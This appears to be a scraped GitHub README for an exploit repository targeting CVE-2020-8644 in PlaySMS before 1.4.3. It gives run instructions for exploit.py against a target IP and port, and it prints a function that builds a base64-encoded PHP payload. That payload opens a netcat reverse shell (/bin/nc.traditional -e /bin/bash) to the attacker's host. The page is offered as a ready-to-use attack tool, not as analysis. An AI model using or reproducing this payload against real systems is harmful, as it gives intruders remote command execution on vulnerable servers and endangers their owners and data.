CVE-2020-8644-PlaySMS-1.4

Python script to exploit PlaySMS before 1.4.3

Execution

Open a port on your machine:

And the execute exploit.py:

./exploit.py <target-ip> <target-port> <your-ip> <your-open-port>

Changing the exploit

Tou may want to change the reverse shell created by exploit.py

To do this, you can change the function create_revshell_encoded on lines 14 to 19 of exploit.py:

def create_revshell_encoded(lhost,lport):
    # Change if you need
    revshell = "/*<?php /**/ system('/bin/nc.traditional "+lhost + " " + lport + " -e /bin/bash');"
    revshell_encoded = base64_encode(revshell)
    revshell_encoded = revshell_encoded.split('=')[0]
    return revshell_encoded

This code was developed to exploit a specific scenario where the target machine had /bin/nc.traditional available.

Name		Name	Last commit message	Last commit date
Latest commit History 3 Commits
img		img
README.md		README.md
exploit.py		exploit.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

CVE-2020-8644-PlaySMS-1.4

Execution

Changing the exploit

About

Releases

Packages

Languages

H3rm1tR3b0rn/CVE-2020-8644-PlaySMS-1.4

Folders and files

Latest commit

History

Repository files navigation

CVE-2020-8644-PlaySMS-1.4

Execution

Changing the exploit

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages